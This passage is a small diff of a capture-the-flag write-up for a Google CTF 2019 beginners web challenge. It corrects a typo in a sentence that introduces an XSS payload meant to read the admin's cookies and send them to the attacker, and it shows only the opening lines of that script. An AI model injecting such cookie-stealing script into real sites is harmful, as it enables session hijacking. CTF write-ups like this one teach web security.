ultimate-theory-of-everything/ctf-writeups/googlectf-2019/beginners/government-argriculture-network.md

 [...]
 ```

-Let's modify the scipt to fetch admin's cookies and send it to us:
+Let's modify the script to fetch admin's cookies and send it to us:
 ```
 <script>
 cookie = document.cookie